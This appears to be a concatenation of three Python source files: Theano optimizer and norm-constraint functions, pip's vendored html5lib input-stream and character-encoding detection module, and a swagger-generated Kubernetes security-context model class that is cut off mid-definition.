all_grads = theano.grad(loss, all_params)
all_accumulators = [theano.shared(np.zeros(param.get_value().shape,
dtype=theano.config.floatX),
broadcastable=param.broadcastable)
for param in all_params]
updates = []
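    # Update rule implemented below:
    #     acc   <- acc + grad**2
    #     param <- param - learning_rate * grad / sqrt(acc + epsilon)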
for param_i, grad_i, acc_i in zip(all_params, all_grads, all_accumulators):
acc_i_new = acc_i + grad_i ** 2
updates.append((acc_i, acc_i_new))
updates.append((param_i, (param_i - learning_rate * grad_i /
T.sqrt(acc_i_new + epsilon))))
return updates
def rmsprop(loss, all_params, learning_rate=1.0, rho=0.9, epsilon=1e-6):
"""
epsilon is not included in the description in Hinton's video,
but to prevent problems with relus repeatedly having 0 gradients,
it is included here.
Watch this video for more info: http://www.youtube.com/watch?v=O3sxAc4hxZU
(formula at 5:20)
also check http://climin.readthedocs.org/en/latest/rmsprop.html
"""
all_grads = theano.grad(loss, all_params)
all_accumulators = [theano.shared(np.zeros(param.get_value().shape,
dtype=theano.config.floatX),
broadcastable=param.broadcastable)
for param in all_params]
updates = []
for param_i, grad_i, acc_i in zip(all_params, all_grads, all_accumulators):
acc_i_new = rho * acc_i + (1 - rho) * grad_i ** 2
updates.append((acc_i, acc_i_new))
updates.append((param_i, (param_i - learning_rate * grad_i /
T.sqrt(acc_i_new + epsilon))))
return updates
def adadelta(loss, all_params, learning_rate=1.0, rho=0.95, epsilon=1e-6):
"""
in the paper, no learning rate is considered (so learning_rate=1.0).
Probably best to keep it at this value.
epsilon is important for the very first update (so the numerator does
not become 0).
rho = 0.95 and epsilon=1e-6 are suggested in the paper and reported to
work for multiple datasets (MNIST, speech).
see "Adadelta: an adaptive learning rate method" by Matthew Zeiler
for more info.
"""
all_grads = theano.grad(loss, all_params)
all_accumulators = [theano.shared(np.zeros(param.get_value().shape,
dtype=theano.config.floatX),
broadcastable=param.broadcastable)
for param in all_params]
all_delta_accumulators = [
theano.shared(np.zeros(param.get_value().shape,
dtype=theano.config.floatX),
broadcastable=param.broadcastable)
for param in all_params
]
# all_accumulators: accumulate gradient magnitudes
# all_delta_accumulators: accumulate update magnitudes (recursive!)
updates = []
for param_i, grad_i, acc_i, acc_delta_i in zip(all_params,
all_grads,
all_accumulators,
all_delta_accumulators):
acc_i_new = rho * acc_i + (1 - rho) * grad_i ** 2
updates.append((acc_i, acc_i_new))
update_i = (grad_i * T.sqrt(acc_delta_i + epsilon) /
# use the 'old' acc_delta here
T.sqrt(acc_i_new + epsilon))
updates.append((param_i, param_i - learning_rate * update_i))
acc_delta_i_new = rho * acc_delta_i + (1 - rho) * update_i ** 2
updates.append((acc_delta_i, acc_delta_i_new))
return updates
def norm_constraint(tensor_var, max_norm, norm_axes=None, epsilon=1e-7):
"""
Max weight norm constraints and gradient clipping
This takes a TensorVariable and rescales it so that incoming weight
norms are below a specified constraint value. Vectors violating the
constraint are rescaled so that they are within the allowed range.
:parameters:
- tensor_var : TensorVariable
Theano expression for update, gradient, or other quantity.
- max_norm : scalar
This value sets the maximum allowed value of any norm in
`tensor_var`.
- norm_axes : sequence (list or tuple)
The axes over which to compute the norm. This overrides the
default norm axes defined for the number of dimensions
in `tensor_var`. When this is not specified and `tensor_var` is a
matrix (2D), this is set to `(0,)`. If `tensor_var` is a 3D, 4D or
5D tensor, it is set to a tuple listing all axes but axis 0. The
former default is useful for working with dense layers, the latter
is useful for 1D, 2D and 3D convolutional layers.
(Optional)
- epsilon : scalar
Value used to prevent numerical instability when dividing by
very small or zero norms.
(Optional)
:returns:
- constrained_output : TensorVariable
Input `tensor_var` with rescaling applied to weight vectors
that violate the specified constraints.
:usage:
>>> param = theano.shared(
... np.random.randn(100, 200).astype(theano.config.floatX))
>>> update = param + 100
>>> update = norm_constraint(update, 10)
>>> func = theano.function([], [], updates=[(param, update)])
>>> # Apply constrained update
>>> _ = func()
>>> from lasagne.utils import compute_norms
>>> norms = compute_norms(param.get_value())
>>> np.isclose(np.max(norms), 10)
True
:note:
When `norm_axes` is not specified, the axes over which the norm is
computed depend on the dimensionality of the input variable. If it is
2D, it is assumed to come from a dense layer, and the norm is computed
over axis 0. If it is 3D, 4D or 5D, it is assumed to come from a
convolutional layer and the norm is computed over all trailing axes
beyond axis 0. For other uses, you should explicitly specify the axes
over which to compute the norm using `norm_axes`.
"""
ndim = tensor_var.ndim
if norm_axes is not None:
sum_over = tuple(norm_axes)
elif ndim == 2: # DenseLayer
sum_over = (0,)
elif ndim in [3, 4, 5]: # Conv{1,2,3}DLayer
sum_over = tuple(range(1, ndim))
else:
raise ValueError(
"Unsupported tensor dimensionality {}."
"Must specify `norm_axes`".format(ndim)
)
dtype = np.dtype(theano.config.floatX).type
norms = T.sqrt(T.sum(T.sqr(tensor_var), axis=sum_over, keepdims=True))
target_norms = T.clip(norms, 0, dtype(max_norm))
constrained_output = \
(tensor_var * (target_norms / (dtype(epsilon) + norms)))
return constrained_output
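# Hedged sketch (added for illustration): norm_constraint is typically applied
# to the new parameter values produced by one of the update rules above, e.g.
# to enforce a max-norm constraint on dense weight matrices. The helper name
# and max_norm value below are hypothetical.
def _example_max_norm_updates(loss, all_params, max_norm=3.0):
    updates = rmsprop(loss, all_params, learning_rate=0.001)
    param_ids = {id(p) for p in all_params}
    constrained = []
    for var, new_value in updates:
        # only rescale actual parameters (not the accumulators) that are 2D
        if id(var) in param_ids and var.ndim == 2:
            new_value = norm_constraint(new_value, max_norm)
        constrained.append((var, new_value))
    return constrained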
|
|
from __future__ import absolute_import, division, unicode_literals
from pip._vendor.six import text_type, binary_type
from pip._vendor.six.moves import http_client, urllib
import codecs
import re
from pip._vendor import webencodings
from .constants import EOF, spaceCharacters, asciiLetters, asciiUppercase
from .constants import ReparseException
from . import _utils
from io import StringIO
try:
from io import BytesIO
except ImportError:
BytesIO = StringIO
# Non-unicode versions of constants for use in the pre-parser
spaceCharactersBytes = frozenset([item.encode("ascii") for item in spaceCharacters])
asciiLettersBytes = frozenset([item.encode("ascii") for item in asciiLetters])
asciiUppercaseBytes = frozenset([item.encode("ascii") for item in asciiUppercase])
spacesAngleBrackets = spaceCharactersBytes | frozenset([b">", b"<"])
invalid_unicode_no_surrogate = "[\u0001-\u0008\u000B\u000E-\u001F\u007F-\u009F\uFDD0-\uFDEF\uFFFE\uFFFF\U0001FFFE\U0001FFFF\U0002FFFE\U0002FFFF\U0003FFFE\U0003FFFF\U0004FFFE\U0004FFFF\U0005FFFE\U0005FFFF\U0006FFFE\U0006FFFF\U0007FFFE\U0007FFFF\U0008FFFE\U0008FFFF\U0009FFFE\U0009FFFF\U000AFFFE\U000AFFFF\U000BFFFE\U000BFFFF\U000CFFFE\U000CFFFF\U000DFFFE\U000DFFFF\U000EFFFE\U000EFFFF\U000FFFFE\U000FFFFF\U0010FFFE\U0010FFFF]" # noqa
if _utils.supports_lone_surrogates:
# Use one extra step of indirection and create surrogates with
# eval. Not using this indirection would introduce an illegal
# unicode literal on platforms not supporting such lone
# surrogates.
assert invalid_unicode_no_surrogate[-1] == "]" and invalid_unicode_no_surrogate.count("]") == 1
invalid_unicode_re = re.compile(invalid_unicode_no_surrogate[:-1] +
eval('"\\uD800-\\uDFFF"') + # pylint:disable=eval-used
"]")
else:
invalid_unicode_re = re.compile(invalid_unicode_no_surrogate)
non_bmp_invalid_codepoints = set([0x1FFFE, 0x1FFFF, 0x2FFFE, 0x2FFFF, 0x3FFFE,
0x3FFFF, 0x4FFFE, 0x4FFFF, 0x5FFFE, 0x5FFFF,
0x6FFFE, 0x6FFFF, 0x7FFFE, 0x7FFFF, 0x8FFFE,
0x8FFFF, 0x9FFFE, 0x9FFFF, 0xAFFFE, 0xAFFFF,
0xBFFFE, 0xBFFFF, 0xCFFFE, 0xCFFFF, 0xDFFFE,
0xDFFFF, 0xEFFFE, 0xEFFFF, 0xFFFFE, 0xFFFFF,
0x10FFFE, 0x10FFFF])
ascii_punctuation_re = re.compile("[\u0009-\u000D\u0020-\u002F\u003A-\u0040\u005B-\u0060\u007B-\u007E]")
# Cache for charsUntil()
charsUntilRegEx = {}
class BufferedStream(object):
"""Buffering for streams that do not have buffering of their own
The buffer is implemented as a list of chunks on the assumption that
joining many strings will be slow since it is O(n**2)
"""
def __init__(self, stream):
self.stream = stream
self.buffer = []
self.position = [-1, 0] # chunk number, offset
def tell(self):
pos = 0
for chunk in self.buffer[:self.position[0]]:
pos += len(chunk)
pos += self.position[1]
return pos
def seek(self, pos):
assert pos <= self._bufferedBytes()
offset = pos
i = 0
while len(self.buffer[i]) < offset:
offset -= len(self.buffer[i])
i += 1
self.position = [i, offset]
def read(self, bytes):
if not self.buffer:
return self._readStream(bytes)
elif (self.position[0] == len(self.buffer) and
self.position[1] == len(self.buffer[-1])):
return self._readStream(bytes)
else:
return self._readFromBuffer(bytes)
def _bufferedBytes(self):
return sum([len(item) for item in self.buffer])
def _readStream(self, bytes):
data = self.stream.read(bytes)
self.buffer.append(data)
self.position[0] += 1
self.position[1] = len(data)
return data
def _readFromBuffer(self, bytes):
remainingBytes = bytes
rv = []
bufferIndex = self.position[0]
bufferOffset = self.position[1]
while bufferIndex < len(self.buffer) and remainingBytes != 0:
assert remainingBytes > 0
bufferedData = self.buffer[bufferIndex]
if remainingBytes <= len(bufferedData) - bufferOffset:
bytesToRead = remainingBytes
self.position = [bufferIndex, bufferOffset + bytesToRead]
else:
bytesToRead = len(bufferedData) - bufferOffset
self.position = [bufferIndex, len(bufferedData)]
bufferIndex += 1
rv.append(bufferedData[bufferOffset:bufferOffset + bytesToRead])
remainingBytes -= bytesToRead
bufferOffset = 0
if remainingBytes:
rv.append(self._readStream(remainingBytes))
return b"".join(rv)
def HTMLInputStream(source, **kwargs):
# Work around Python bug #20007: read(0) closes the connection.
# http://bugs.python.org/issue20007
if (isinstance(source, http_client.HTTPResponse) or
# Also check for addinfourl wrapping HTTPResponse
(isinstance(source, urllib.response.addbase) and
isinstance(source.fp, http_client.HTTPResponse))):
isUnicode = False
elif hasattr(source, "read"):
isUnicode = isinstance(source.read(0), text_type)
else:
isUnicode = isinstance(source, text_type)
if isUnicode:
encodings = [x for x in kwargs if x.endswith("_encoding")]
if encodings:
raise TypeError("Cannot set an encoding with a unicode input, set %r" % encodings)
return HTMLUnicodeInputStream(source, **kwargs)
else:
return HTMLBinaryInputStream(source, **kwargs)
class HTMLUnicodeInputStream(object):
"""Provides a unicode stream of characters to the HTMLTokenizer.
This class takes care of character encoding and removing or replacing
incorrect byte-sequences and also provides column and line tracking.
"""
_defaultChunkSize = 10240
def __init__(self, source):
"""Initialises the HTMLInputStream.
HTMLInputStream(source, [encoding]) -> Normalized stream from source
for use by html5lib.
source can be either a file-object, local filename or a string.
The optional encoding parameter must be a string that indicates
the encoding. If specified, that encoding will be used,
regardless of any BOM or later declaration (such as in a meta
element)
"""
if not _utils.supports_lone_surrogates:
# Such platforms will have already checked for such
# surrogate errors, so no need to do this checking.
self.reportCharacterErrors = None
elif len("\U0010FFFF") == 1:
self.reportCharacterErrors = self.characterErrorsUCS4
else:
self.reportCharacterErrors = self.characterErrorsUCS2
# List of where new lines occur
self.newLines = [0]
self.charEncoding = (lookupEncoding("utf-8"), "certain")
self.dataStream = self.openStream(source)
self.reset()
def reset(self):
self.chunk = ""
self.chunkSize = 0
self.chunkOffset = 0
self.errors = []
# number of (complete) lines in previous chunks
self.prevNumLines = 0
# number of columns in the last line of the previous chunk
self.prevNumCols = 0
# Deal with CR LF and surrogates split over chunk boundaries
self._bufferedCharacter = None
def openStream(self, source):
"""Produces a file object from source.
source can be either a file object, local filename or a string.
"""
# Already a file object
if hasattr(source, 'read'):
stream = source
else:
stream = StringIO(source)
return stream
def _position(self, offset):
chunk = self.chunk
nLines = chunk.count('\n', 0, offset)
positionLine = self.prevNumLines + nLines
lastLinePos = chunk.rfind('\n', 0, offset)
if lastLinePos == -1:
positionColumn = self.prevNumCols + offset
else:
positionColumn = offset - (lastLinePos + 1)
return (positionLine, positionColumn)
def position(self):
"""Returns (line, col) of the current position in the stream."""
line, col = self._position(self.chunkOffset)
return (line + 1, col)
def char(self):
""" Read one character from the stream or queue if available. Return
EOF when EOF is reached.
"""
# Read a new chunk from the input stream if necessary
if self.chunkOffset >= self.chunkSize:
if not self.readChunk():
return EOF
chunkOffset = self.chunkOffset
char = self.chunk[chunkOffset]
self.chunkOffset = chunkOffset + 1
return char
def readChunk(self, chunkSize=None):
if chunkSize is None:
chunkSize = self._defaultChunkSize
self.prevNumLines, self.prevNumCols = self._position(self.chunkSize)
self.chunk = ""
self.chunkSize = 0
self.chunkOffset = 0
data = self.dataStream.read(chunkSize)
# Deal with CR LF and surrogates broken across chunks
if self._bufferedCharacter:
data = self._bufferedCharacter + data
self._bufferedCharacter = None
elif not data:
# We have no more data, bye-bye stream
return False
if len(data) > 1:
lastv = ord(data[-1])
if lastv == 0x0D or 0xD800 <= lastv <= 0xDBFF:
self._bufferedCharacter = data[-1]
data = data[:-1]
if self.reportCharacterErrors:
self.reportCharacterErrors(data)
# Replace invalid characters
data = data.replace("\r\n", "\n")
data = data.replace("\r", "\n")
self.chunk = data
self.chunkSize = len(data)
return True
def characterErrorsUCS4(self, data):
for _ in range(len(invalid_unicode_re.findall(data))):
self.errors.append("invalid-codepoint")
def characterErrorsUCS2(self, data):
# Someone picked the wrong compile option
# You lose
skip = False
for match in invalid_unicode_re.finditer(data):
if skip:
continue
codepoint = ord(match.group())
pos = match.start()
# Pretty sure there should be endianness issues here
if _utils.isSurrogatePair(data[pos:pos + 2]):
# We have a surrogate pair!
char_val = _utils.surrogatePairToCodepoint(data[pos:pos + 2])
if char_val in non_bmp_invalid_codepoints:
self.errors.append("invalid-codepoint")
skip = True
elif (codepoint >= 0xD800 and codepoint <= 0xDFFF and
pos == len(data) - 1):
self.errors.append("invalid-codepoint")
else:
skip = False
self.errors.append("invalid-codepoint")
def charsUntil(self, characters, opposite=False):
""" Returns a string of characters from the stream up to but not
including any character in 'characters' or EOF. 'characters' must be
a container that supports the 'in' method and iteration over its
characters.
"""
# Use a cache of regexps to find the required characters
try:
chars = charsUntilRegEx[(characters, opposite)]
except KeyError:
if __debug__:
for c in characters:
assert(ord(c) < 128)
regex = "".join(["\\x%02x" % ord(c) for c in characters])
if not opposite:
regex = "^%s" % regex
chars = charsUntilRegEx[(characters, opposite)] = re.compile("[%s]+" % regex)
rv = []
while True:
# Find the longest matching prefix
m = chars.match(self.chunk, self.chunkOffset)
if m is None:
# If nothing matched, and it wasn't because we ran out of chunk,
# then stop
if self.chunkOffset != self.chunkSize:
break
else:
end = m.end()
# If not the whole chunk matched, return everything
# up to the part that didn't match
if end != self.chunkSize:
rv.append(self.chunk[self.chunkOffset:end])
self.chunkOffset = end
break
# If the whole remainder of the chunk matched,
# use it all and read the next chunk
rv.append(self.chunk[self.chunkOffset:])
if not self.readChunk():
# Reached EOF
break
r = "".join(rv)
return r
def unget(self, char):
# Only one character is allowed to be ungotten at once - it must
# be consumed again before any further call to unget
if char is not None:
if self.chunkOffset == 0:
# unget is called quite rarely, so it's a good idea to do
# more work here if it saves a bit of work in the frequently
# called char and charsUntil.
# So, just prepend the ungotten character onto the current
# chunk:
self.chunk = char + self.chunk
self.chunkSize += 1
else:
self.chunkOffset -= 1
assert self.chunk[self.chunkOffset] == char
class HTMLBinaryInputStream(HTMLUnicodeInputStream):
"""Provides a unicode stream of characters to the HTMLTokenizer.
This class takes care of character encoding and removing or replacing
incorrect byte-sequences and also provides column and line tracking.
"""
def __init__(self, source, override_encoding=None, transport_encoding=None,
same_origin_parent_encoding=None, likely_encoding=None,
default_encoding="windows-1252", useChardet=True):
"""Initialises the HTMLInputStream.
HTMLInputStream(source, [encoding]) -> Normalized stream from source
for use by html5lib.
source can be either a file-object, local filename or a string.
The optional encoding parameter must be a string that indicates
the encoding. If specified, that encoding will be used,
regardless of any BOM or later declaration (such as in a meta
element)
"""
# Raw Stream - for unicode objects this will encode to utf-8 and set
# self.charEncoding as appropriate
self.rawStream = self.openStream(source)
HTMLUnicodeInputStream.__init__(self, self.rawStream)
# Encoding Information
# Number of bytes to use when looking for a meta element with
# encoding information
self.numBytesMeta = 1024
# Number of bytes to use when using detecting encoding using chardet
self.numBytesChardet = 100
# Things from args
self.override_encoding = override_encoding
self.transport_encoding = transport_encoding
self.same_origin_parent_encoding = same_origin_parent_encoding
self.likely_encoding = likely_encoding
self.default_encoding = default_encoding
# Determine encoding
self.charEncoding = self.determineEncoding(useChardet)
assert self.charEncoding[0] is not None
# Call superclass
self.reset()
def reset(self):
self.dataStream = self.charEncoding[0].codec_info.streamreader(self.rawStream, 'replace')
HTMLUnicodeInputStream.reset(self)
def openStream(self, source):
"""Produces a file object from source.
source can be either a file object, local filename or a string.
"""
# Already a file object
if hasattr(source, 'read'):
stream = source
else:
stream = BytesIO(source)
try:
stream.seek(stream.tell())
except: # pylint:disable=bare-except
stream = BufferedStream(stream)
return stream
def determineEncoding(self, chardet=True):
# BOMs take precedence over everything
# This will also read past the BOM if present
charEncoding = self.detectBOM(), "certain"
if charEncoding[0] is not None:
return charEncoding
# If we've been overridden, we've been overridden
charEncoding = lookupEncoding(self.override_encoding), "certain"
if charEncoding[0] is not None:
return charEncoding
# Now check the transport layer
charEncoding = lookupEncoding(self.transport_encoding), "certain"
if charEncoding[0] is not None:
return charEncoding
# Look for meta elements with encoding information
charEncoding = self.detectEncodingMeta(), "tentative"
if charEncoding[0] is not None:
return charEncoding
# Parent document encoding
charEncoding = lookupEncoding(self.same_origin_parent_encoding), "tentative"
if charEncoding[0] is not None and not charEncoding[0].name.startswith("utf-16"):
return charEncoding
# "likely" encoding
charEncoding = lookupEncoding(self.likely_encoding), "tentative"
if charEncoding[0] is not None:
return charEncoding
# Guess with chardet, if available
if chardet:
try:
from chardet.universaldetector import UniversalDetector
except ImportError:
pass
else:
buffers = []
detector = UniversalDetector()
while not detector.done:
buffer = self.rawStream.read(self.numBytesChardet)
assert isinstance(buffer, bytes)
if not buffer:
break
buffers.append(buffer)
detector.feed(buffer)
detector.close()
encoding = lookupEncoding(detector.result['encoding'])
self.rawStream.seek(0)
if encoding is not None:
return encoding, "tentative"
# Try the default encoding
charEncoding = lookupEncoding(self.default_encoding), "tentative"
if charEncoding[0] is not None:
return charEncoding
# Fallback to html5lib's default if even that hasn't worked
return lookupEncoding("windows-1252"), "tentative"
def changeEncoding(self, newEncoding):
assert self.charEncoding[1] != "certain"
newEncoding = lookupEncoding(newEncoding)
if newEncoding is None:
return
if newEncoding.name in ("utf-16be", "utf-16le"):
newEncoding = lookupEncoding("utf-8")
assert newEncoding is not None
elif newEncoding == self.charEncoding[0]:
self.charEncoding = (self.charEncoding[0], "certain")
else:
self.rawStream.seek(0)
self.charEncoding = (newEncoding, "certain")
self.reset()
raise ReparseException("Encoding changed from %s to %s" % (self.charEncoding[0], newEncoding))
def detectBOM(self):
"""Attempts to detect at BOM at the start of the stream. If
an encoding can be determined from the BOM return the name of the
encoding otherwise return None"""
bomDict = {
codecs.BOM_UTF8: 'utf-8',
codecs.BOM_UTF16_LE: 'utf-16le', codecs.BOM_UTF16_BE: 'utf-16be',
codecs.BOM_UTF32_LE: 'utf-32le', codecs.BOM_UTF32_BE: 'utf-32be'
}
# Go to beginning of file and read in 4 bytes
string = self.rawStream.read(4)
assert isinstance(string, bytes)
# Try detecting the BOM using bytes from the string
encoding = bomDict.get(string[:3]) # UTF-8
seek = 3
if not encoding:
# Need to detect UTF-32 before UTF-16
encoding = bomDict.get(string) # UTF-32
seek = 4
if not encoding:
encoding = bomDict.get(string[:2]) # UTF-16
seek = 2
# Set the read position past the BOM if one was found, otherwise
# set it to the start of the stream
if encoding:
self.rawStream.seek(seek)
return lookupEncoding(encoding)
else:
self.rawStream.seek(0)
return None
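# Hedged worked examples (added for illustration) of the mapping above:
#   detectBOM() on b"\xef\xbb\xbfhello"     -> utf-8 codec, stream seeked to 3
#   detectBOM() on b"\xff\xfeh\x00i\x00..." -> utf-16le codec, stream seeked to 2
#   no recognisable BOM                     -> None, stream seeked back to 0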
def detectEncodingMeta(self):
"""Report the encoding declared by the meta element
"""
buffer = self.rawStream.read(self.numBytesMeta)
assert isinstance(buffer, bytes)
parser = EncodingParser(buffer)
self.rawStream.seek(0)
encoding = parser.getEncoding()
if encoding is not None and encoding.name in ("utf-16be", "utf-16le"):
encoding = lookupEncoding("utf-8")
return encoding
class EncodingBytes(bytes):
"""String-like object with an associated position and various extra methods
If the position is ever greater than the string length then an exception is
raised"""
def __new__(self, value):
assert isinstance(value, bytes)
return bytes.__new__(self, value.lower())
def __init__(self, value):
# pylint:disable=unused-argument
self._position = -1
def __iter__(self):
return self
def __next__(self):
p = self._position = self._position + 1
if p >= len(self):
raise StopIteration
elif p < 0:
raise TypeError
return self[p:p + 1]
def next(self):
# Py2 compat
return self.__next__()
def previous(self):
p = self._position
if p >= len(self):
raise StopIteration
elif p < 0:
raise TypeError
self._position = p = p - 1
return self[p:p + 1]
def setPosition(self, position):
if self._position >= len(self):
raise StopIteration
self._position = position
def getPosition(self):
if self._position >= len(self):
raise StopIteration
if self._position >= 0:
return self._position
else:
return None
position = property(getPosition, setPosition)
def getCurrentByte(self):
return self[self.position:self.position + 1]
currentByte = property(getCurrentByte)
def skip(self, chars=spaceCharactersBytes):
"""Skip past a list of characters"""
p = self.position # use property for the error-checking
while p < len(self):
c = self[p:p + 1]
if c not in chars:
self._position = p
return c
p += 1
self._position = p
return None
def skipUntil(self, chars):
p = self.position
while p < len(self):
c = self[p:p + 1]
if c in chars:
self._position = p
return c
p += 1
self._position = p
return None
def matchBytes(self, bytes):
"""Look for a sequence of bytes at the start of a string. If the bytes
are found return True and advance the position to the byte after the
match. Otherwise return False and leave the position alone"""
p = self.position
data = self[p:p + len(bytes)]
rv = data.startswith(bytes)
if rv:
self.position += len(bytes)
return rv
def jumpTo(self, bytes):
"""Look for the next sequence of bytes matching a given sequence. If
a match is found advance the position to the last byte of the match"""
newPosition = self[self.position:].find(bytes)
if newPosition > -1:
# XXX: This is ugly, but I can't see a nicer way to fix this.
if self._position == -1:
self._position = 0
self._position += (newPosition + len(bytes) - 1)
return True
else:
raise StopIteration
class EncodingParser(object):
"""Mini parser for detecting character encoding from meta elements"""
def __init__(self, data):
"""string - the data to work on for encoding detection"""
self.data = EncodingBytes(data)
self.encoding = None
def getEncoding(self):
methodDispatch = (
(b"<!--", self.handleComment),
(b"<meta", self.handleMeta),
(b"</", self.handlePossibleEndTag),
(b"<!", self.handleOther),
(b"<?", self.handleOther),
(b"<", self.handlePossibleStartTag))
for _ in self.data:
keepParsing = True
for key, method in methodDispatch:
if self.data.matchBytes(key):
try:
keepParsing = method()
break
except StopIteration:
keepParsing = False
break
if not keepParsing:
break
return self.encoding
def handleComment(self):
"""Skip over comments"""
return self.data.jumpTo(b"-->")
def handleMeta(self):
if self.data.currentByte not in spaceCharactersBytes:
# if we have <meta not followed by a space, just keep going
return True
# We have a valid meta element we want to search for attributes
hasPragma = False
pendingEncoding = None
while True:
# Try to find the next attribute after the current position
attr = self.getAttribute()
if attr is None:
return True
else:
if attr[0] == b"http-equiv":
hasPragma = attr[1] == b"content-type"
if hasPragma and pendingEncoding is not None:
self.encoding = pendingEncoding
return False
elif attr[0] == b"charset":
tentativeEncoding = attr[1]
codec = lookupEncoding(tentativeEncoding)
if codec is not None:
self.encoding = codec
return False
elif attr[0] == b"content":
contentParser = ContentAttrParser(EncodingBytes(attr[1]))
tentativeEncoding = contentParser.parse()
if tentativeEncoding is not None:
codec = lookupEncoding(tentativeEncoding)
if codec is not None:
if hasPragma:
self.encoding = codec
return False
else:
pendingEncoding = codec
def handlePossibleStartTag(self):
return self.handlePossibleTag(False)
def handlePossibleEndTag(self):
next(self.data)
return self.handlePossibleTag(True)
def handlePossibleTag(self, endTag):
data = self.data
if data.currentByte not in asciiLettersBytes:
# If the next byte is not an ascii letter either ignore this
# fragment (possible start tag case) or treat it according to
# handleOther
if endTag:
data.previous()
self.handleOther()
return True
c = data.skipUntil(spacesAngleBrackets)
if c == b"<":
# return to the first step in the overall "two step" algorithm
# reprocessing the < byte
data.previous()
else:
# Read all attributes
attr = self.getAttribute()
while attr is not None:
attr = self.getAttribute()
return True
def handleOther(self):
return self.data.jumpTo(b">")
def getAttribute(self):
"""Return a name,value pair for the next attribute in the stream,
if one is found, or None"""
data = self.data
# Step 1 (skip chars)
c = data.skip(spaceCharactersBytes | frozenset([b"/"]))
assert c is None or len(c) == 1
# Step 2
if c in (b">", None):
return None
# Step 3
attrName = []
attrValue = []
# Step 4 attribute name
while True:
if c == b"=" and attrName:
break
elif c in spaceCharactersBytes:
# Step 6!
c = data.skip()
break
elif c in (b"/", b">"):
return b"".join(attrName), b""
elif c in asciiUppercaseBytes:
attrName.append(c.lower())
elif c is None:
return None
else:
attrName.append(c)
# Step 5
c = next(data)
# Step 7
if c != b"=":
data.previous()
return b"".join(attrName), b""
# Step 8
next(data)
# Step 9
c = data.skip()
# Step 10
if c in (b"'", b'"'):
# 10.1
quoteChar = c
while True:
# 10.2
c = next(data)
# 10.3
if c == quoteChar:
next(data)
return b"".join(attrName), b"".join(attrValue)
# 10.4
elif c in asciiUppercaseBytes:
attrValue.append(c.lower())
# 10.5
else:
attrValue.append(c)
elif c == b">":
return b"".join(attrName), b""
elif c in asciiUppercaseBytes:
attrValue.append(c.lower())
elif c is None:
return None
else:
attrValue.append(c)
# Step 11
while True:
c = next(data)
if c in spacesAngleBrackets:
return b"".join(attrName), b"".join(attrValue)
elif c in asciiUppercaseBytes:
attrValue.append(c.lower())
elif c is None:
return None
else:
attrValue.append(c)
class ContentAttrParser(object):
def __init__(self, data):
assert isinstance(data, bytes)
self.data = data
def parse(self):
try:
# Check if the attr name is charset
# otherwise return
self.data.jumpTo(b"charset")
self.data.position += 1
self.data.skip()
if not self.data.currentByte == b"=":
# If there is no = sign keep looking for attrs
return None
self.data.position += 1
self.data.skip()
# Look for an encoding between matching quote marks
if self.data.currentByte in (b'"', b"'"):
quoteMark = self.data.currentByte
self.data.position += 1
oldPosition = self.data.position
if self.data.jumpTo(quoteMark):
return self.data[oldPosition:self.data.position]
else:
return None
else:
# Unquoted value
oldPosition = self.data.position
try:
self.data.skipUntil(spaceCharactersBytes)
return self.data[oldPosition:self.data.position]
except StopIteration:
# Return the whole remaining value
return self.data[oldPosition:]
except StopIteration:
return None
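# Hedged usage sketch (added for illustration): EncodingParser scans a byte
# prefix of the document for a meta declaration and hands the label to
# lookupEncoding below; per the WHATWG encoding label table, "iso-8859-1" is
# expected to resolve to the windows-1252 codec.
def _example_meta_sniff():
    parser = EncodingParser(b'<html><head><meta charset="ISO-8859-1">')
    codec = parser.getEncoding()
    return None if codec is None else codec.name   # expected: "windows-1252"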
def lookupEncoding(encoding):
"""Return the python codec name corresponding to an encoding or None if the
string doesn't correspond to a valid encoding."""
if isinstance(encoding, binary_type):
try:
encoding = encoding.decode("ascii")
except UnicodeDecodeError:
return None
if encoding is not None:
try:
return webencodings.lookup(encoding)
except AttributeError:
return None
else:
return None
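# Hedged usage sketch (added for illustration, not part of html5lib): passing
# bytes to HTMLInputStream yields a binary stream that sniffs the declared
# encoding and then serves decoded characters one at a time.
def _example_html_input_stream():
    raw = b'<meta charset="utf-8"><p>caf\xc3\xa9</p>'
    stream = HTMLInputStream(raw)
    chars = []
    while True:
        c = stream.char()
        if c is EOF:
            break
        chars.append(c)
    return stream.charEncoding[0].name, u"".join(chars)   # ("utf-8", decoded text)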
|
|
# coding: utf-8
"""
OpenAPI spec version:
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from pprint import pformat
from six import iteritems
import re
class V1SecurityContext(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
operations = [
]
# The key is attribute name
# and the value is attribute type.
swagger_types = {
'capabilities': 'V1Capabilities',
'privileged': 'bool',
'se_linux_options': 'V1SELinuxOptions',
'run_as_user': 'int',
'run_as_non_root': 'bool',
'read_only_root_filesystem': 'bool'
}
# The key is attribute name
# and the value is json key in definition.
attribute_map = {
'capabilities': 'capabilities',
'privileged': 'privileged',
'se_linux_options': 'seLinuxOptions',
'run_as_user': 'runAsUser',
'run_as_non_root': 'runAsNonRoot',
'read_only_root_filesystem': 'readOnlyRootFilesystem'
}
def __init__(self, capabilities=None, privileged=None, se_linux_options=None, run_as_user=None, run_as_non_root=None, read_only_root_filesystem=None):
"""
V1SecurityContext - a model defined in Swagger
"""
self._capabilities = capabilities
self._privileged = privileged
self._se_linux_options = se_linux_options
self._run_as_user = run_as_user
self._run_as_non_root = run_as_non_root
self._read_only_root_filesystem = read_only_root_filesystem
@property
def capabilities(self):
"""
Gets the capabilities of this V1SecurityContext.
The capabilities to add/drop when running containers. Defaults to the default set of capabilities granted by the container runtime.
:return: The capabilities of this V1SecurityContext.
:rtype: V1Capabilities
"""
return self._capabilities
@capabilities.setter
def capabilities(self, capabilities):
"""
Sets the capabilities of this V1SecurityContext.
The capabilities to add/drop when running containers. Defaults to the default set of capabilities granted by the container runtime.
:param capabilities: The capabilities of this V1SecurityContext.
:type: V1Capabilities
"""
self._capabilities = capabilities
@property
def privileged(self):
"""
Gets the privileged of this V1SecurityContext.
Run container in privileged mode. Processes in privileged containers are essentially equivalent to root on the host. Defaults to false.
:return: The privileged of this V1SecurityContext.
:rtype: bool
"""
return self._privileged
@privileged.setter
def privileged(self, privileged):
